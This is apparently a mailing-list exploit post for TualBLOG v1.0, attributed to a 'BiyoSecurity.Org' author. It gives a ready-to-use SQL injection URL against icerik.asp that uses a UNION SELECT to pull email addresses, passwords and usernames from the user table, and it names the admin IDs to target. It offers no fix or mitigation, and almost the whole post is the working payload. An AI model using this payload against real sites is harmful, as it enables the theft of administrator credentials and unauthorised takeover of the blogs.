<<< Date Index >>>     <<< Thread Index >>>

TualBLOG v 1.0 multiple sql injection



# BiyoSecurity.Org

# script name : TualBLOG v 1.0 

# Risk : High

# Regards : Dj ReMix

# Thanks : Korsan , Liz0zim

# Vulnerable file : icerik.asp

exp :

http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1


uyeno = 1 or 2( Admin ID )

Bye :=)